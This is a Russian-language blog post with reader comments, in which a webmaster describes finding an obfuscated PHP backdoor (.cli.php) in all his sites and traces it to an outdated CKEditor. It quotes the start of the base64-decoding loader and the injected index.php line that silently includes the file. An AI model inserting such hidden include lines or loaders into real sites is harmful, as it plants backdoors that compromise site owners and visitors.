Приехав с морей я обнаружил в корне всех своих сайтов файл .cli.php. Содержимое файла было закодировано base64
<?php error_reporting(0);
$MTQMzEwNTAxMmE=’base64_decode’;
$MTQMzEwNTAxMmI=$MTQMzEwNTAxMmE(str_replace(“\n”, ”, и далее куча кода.
В начало каждого файла index.php был добавлен вызывающий код.
<?php error_reporting(0); @include_once( dirname(__FILE__) .”/”. urldecode(“%2E%63%6C%69%2E%70%68%70”));?>
Заражал все сайты видимо скрипт, видно что работа не ручная. За 15 минут вся лишняя дрянь была удалена, но возник другой вопрос — откуда она появилась? Большая часть сайтов это WP и только пара сайтов клиентских на самопальных движках и DLE. Поскольку DLE и WP я постоянно обновляю подозрения остались на самописный сайт.
И его редактор Сkeditor. Оказалось, что там стояла версия 4.0.1 в которой была обнаружена уязвимость. Скачал свежий Сkeditor, удалил старый и вроде как отпустило. Надеюсь что добрый хакер не оставил нигде запасной шелл.
Аналогичная дрянь появилась на днях. Сайтов у меня тоже несколько на DLE и WP. Через что лезут пока не понятно – Сkeditor у меня не установлен.
Аналогичная дрянь. И залезло это походу через какие то дырки у firstvds, на котором я смотрю и у вас расположен сайт.
Причем эти файлы были добавлены и индексовые заменены даже в тех сайтах, которые давным давно не работают и недоступны.